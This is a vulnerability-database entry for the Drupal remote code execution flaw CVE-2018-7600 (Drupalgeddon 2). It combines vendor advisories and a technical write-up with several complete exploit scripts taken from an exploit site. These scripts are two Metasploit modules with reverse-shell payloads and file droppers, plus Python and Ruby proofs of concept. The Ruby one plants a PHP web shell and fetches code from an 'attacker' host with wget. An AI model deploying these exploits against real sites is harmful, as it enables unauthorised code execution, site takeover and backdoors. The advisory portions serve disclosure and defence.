ID CVE-2018-7600 Type cve Reporter cve@mitre.org Modified 2019-03-01T18:04:00
Description
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
{"f5": [{"lastseen": "2019-09-26T22:28:10", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2018-03-29T18:25:00", "published": "2018-03-29T18:25:00", "id": "F5:K22854260", "href": "https://support.f5.com/csp/article/K22854260", "title": "Drupal vulnerability CVE-2018-7600", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-08T07:10:20", "bulletinFamily": "exploit", "description": "Two weeks ago, a highly critical (21/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed an unauthenticated attacker to perform remote code execution on default or common Drupal installations.\r\n\r\nDrupal is an open-source content management system (CMS) that is used by more than one million sites around the world (including governments, e-retail, enterprise organizations, financial institutions and more), all of which are vulnerable unless patched.\r\n\r\nUntil now details of the vulnerability were not available to the public, however, Check Point Research can now expand upon this vulnerability and reveal exactly how it works.\r\n\r\nIn brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.\r\n\r\nThe vulnerability existed on all Drupal versions from 6 to 8, though has since been patched to those who manually update their site. In this document we will showcase real life attack scenarios around an out-of-the-box installation of Drupal\u2019s flagship product, Drupal 8.\r\n\r\n### Technical Details\r\n\r\n#### The Vulnerability\r\n\r\nTo provide some background, Drupal\u2019s Form API was introduced in Drupal 6 and allowed alteration of the form data during the form rendering process. This revolutionized the way markup processing was done.\r\n\r\nIn Drupal 7 the Form API was generalized to what is now known as \u201cRenderable Arrays\u201d. This extended API is used to represent the structure of most of the UI elements in Drupal, such as pages, blocks, nodes and more.\r\n\r\nRenderable arrays contain metadata that is used in the rendering process. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). Please see below for an example:\r\n```\r\n[\r\n\u2018#type\u2019 => \u2018markup\u2019,\r\n\u2018#markup\u2019 => \u2018<em>some text</em>\u2019,\r\n\u2018#prefix\u2019 => \u2018<div>\u2019,\r\n\u2018#suffix\u2019 => \u2018</div>\u2019\r\n]\r\n```\r\n\r\n#### Drupal\u2019s Patch\r\n\r\nThe patch that Drupal published adds a single class called RequestSanitizer with a stripDangerousValues method that unsets all the items in an input array for keys that start with a hash sign. This method sanitizes input data in `$_GET`, `$_POST` & `$_COOKIES` during the very early stages of Drupal\u2019s bootstrap (immediately after loading the site configurations).\r\n\r\nWe assume that one of the reasons that the patch was done in this way was to make it harder to find and exploit the vulnerability.\r\n\r\n#### Finding an Attack Vector\r\n\r\nBecause of the above we focused on forms that are exposed to anonymous users.\r\n\r\nThere are a few of those forms available, one of which is the user registration form. This form contains multiple fields, as can be seen in the screenshot below.\r\n\r\n\r\n\r\nFigure 1: The Drupal registration form.\r\n\r\nWe knew that we needed to inject a renderable array somewhere in the form structure, we just had to find out where.\r\n\r\nAs it happens, the \u201cEmail address\u201d field does not sanitize the type of input that it receives. This allowed us to inject an array to the form array structure (as the value of the email field).\r\n\r\n\r\n\r\nFigure 2: Injecting our renderable array into the mail input of the registration form.\r\n\r\n\r\n\r\nFigure 3: Example of injected form renderable array.\r\n\r\nNow all we needed was for Drupal to render our injected array. Since Drupal treats our injected array as a value and not as an element, we needed to trick Drupal into rendering it.\r\n\r\nThe situations in which Drupal renders arrays are as follows:\r\n\r\n1. Page load\r\n2. Drupal AJAX API \u2013 i.e. when a user fills an AJAX form, a request is made to Drupal which renders an HTML markup and updates the form.\r\n\r\n\r\nAfter investigating possible attack vectors surrounding the above functionalities, because of the post-submission rendering process and the way Drupal implements it, we came to the conclusion that an AJAX API call is our best option to leverage an attack.\r\n\r\nAs part of the user registration form, the \u201cPicture\u201d field uses Drupal\u2019s AJAX API to upload a picture into the server and replace it with a thumbnail of the uploaded image.\r\n\r\n\r\n\r\nFigure 4: Form used to upload a picture using AJAX API.\r\n\r\nDiving into the AJAX file upload callback revealed that it uses a GET parameter to locate the part of the form that needs to be updated in the client.\r\n\r\n\r\n\r\nFigure 5: The AJAX \u2018upload file\u2019 callback function code.\r\n\r\nAfter pointing element_parents to the part of the form that contained our injected array, Drupal successfully rendered it.\r\n\r\n#### Weaponizing Drupalgeddon 2\r\n\r\nNow, all we had to do is to inject a malicious render array that uses one of Drupal\u2019s rendering callback to execute code on the system.\r\n\r\nThere were several properties we could have injected:\r\n\r\n* #access_callback\r\n\t* Used by Drupal to determine whether or not the current user has access to an element.\r\n* #pre_render\r\n\t* Manipulates the render array before rendering.\r\n* #lazy_builder\r\n\t* Used to add elements in the very end of the rendering process.\r\n* #post_render\r\n\t* Receives the result of the rendering process and adds wrappers around it.\r\n\t\r\n\t\r\nFor our POC to work, we chose the #lazy_builder element as the one being injected into the mail array. Combined with the AJAX API callback functionality, we could direct Drupal to render our malicious array.\r\n\r\nThis allowed us to take control over the administrator\u2019s account, install a malicious backdoor module and finally execute arbitrary commands on the server.\r\n\r\n\r\n\r\nFigure 6: injecting malicious command into one of Drupal\u2019s rendering callbacks.\r\n\r\n\r\n\r\nFigure 7: Successfully executing shell commands using the malicious module.\r\n\r\n### Conclusion\r\n\r\nAfter seeing earlier publications on Twitter and several security blogs, it was apparent that there was much confusion among the community regarding this vulnerability announcement, with some even doubting the severity of it. As a result, we considered it worthwhile to looking deeper into.\r\n\r\nThe research however was challenging as we were starting from a very large attack surface since the patch blurred the real attack vectors. To expedite our findings, we were fortunate to be joined by experts in the Drupal platform. The final results highlight how easy it is for organization to be exposed through no fault of their own, but rather through the third party platforms they use every day.", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "id": "SSV:97207", "href": "https://www.seebug.org/vuldb/ssvid-97207", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7600)\n (Drupalgeddon2)", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "zdt": [{"lastseen": "2018-04-18T03:54:57", "bulletinFamily": "exploit", "description": "Exploit for php platform in category remote exploits", "modified": "2018-04-17T00:00:00", "published": "2018-04-17T00:00:00", "href": "https://0day.today/exploit/description/30199", "id": "1337DAY-ID-30199", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n \r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30199", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T23:26:54", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "modified": "2018-04-26T00:00:00", "published": "2018-04-26T00:00:00", "href": "https://0day.today/exploit/description/30268", "id": "1337DAY-ID-30268", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case @version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30268"}, {"lastseen": "2018-04-20T19:55:56", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-04-18T00:00:00", "published": "2018-04-18T00:00:00", "href": "https://0day.today/exploit/description/30200", "id": "1337DAY-ID-30200", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - Drupalgeddon2 Remote Code Execution Exploit", "type": "zdt", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n \r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n \r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n \r\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n \r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n \r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-20] #", "sourceHref": "https://0day.today/exploit/30200", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-14T17:44:43", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-04-13T00:00:00", "published": "2018-04-13T00:00:00", "href": "https://0day.today/exploit/description/30171", "id": "1337DAY-ID-30171", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "sourceData": "require 'net/http' \r\n \r\n # Hans Topo ruby port from Drupalggedon2 exploit. \r\n # Based on Vitalii Rudnykh exploit \r\n \r\n target = ARGV[0] \r\n command = ARGV[1] \r\n \r\n url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n \r\n shell = \"<?php system($_GET['cmd']); ?>\" \r\n \r\n payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \r\n \r\n uri = URI(url) \r\n \r\n http = Net::HTTP.new(uri.host,uri.port) \r\n \r\n if uri.scheme == 'https' \r\n \thttp.use_ssl = true \r\n \thttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \r\n end \r\n \r\n req = Net::HTTP::Post.new(uri.path) \r\n req.body = payload \r\n \r\n response = http.request(req) \r\n \r\n if response.code != \"200\" \r\n \tputs \"[*] Response: \" + response.code \r\n \tputs \"[*] Target seems not to be exploitable\" \r\n \texit \r\n end \r\n \r\n puts \"[*] Target seems to be exploitable.\" \r\n \r\n exploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \r\n response = Net::HTTP.get_response(exploit_uri) \r\n puts response.body\r\n\r\n----------------------Exploit PoC 2---------------------------\r\n\r\n import sys \r\n import requests \r\n \r\n print ('################################################################') \r\n print ('# Proof-Of-Concept for CVE-2018-7600') \r\n print ('# by Vitalii Rudnykh') \r\n print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \r\n print ('# https://github.com/a2u/CVE-2018-7600') \r\n print ('################################################################') \r\n print ('Provided only for educational or information purposes\\n') \r\n \r\n target = raw_input('Enter target url (example: https://domain.ltd/): ') \r\n \r\n url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \r\n \r\n r = requests.post(url, data=payload) \r\n if r.status_code != 200: \r\n sys.exit(\"Not exploitable\") \r\n print ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30171", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:56", "bulletinFamily": "unix", "description": "\nDrupal Security Team reports:\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6,\n\t and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because\n\t of an issue affecting multiple subsystems with default or common module configurations.\n\n", "modified": "2018-03-13T00:00:00", "published": "2018-03-13T00:00:00", "id": "A9E466E8-4144-11E8-A292-00E04C1EA73D", "href": "https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html", "title": "drupal -- Drupal Core - Multiple Vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:36", "bulletinFamily": "unix", "description": "Package : drupal7\nVersion : 7.14-2+deb7u18\nCVE ID : CVE-2018-7600\n\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\nFor further information please refer to the official upstream 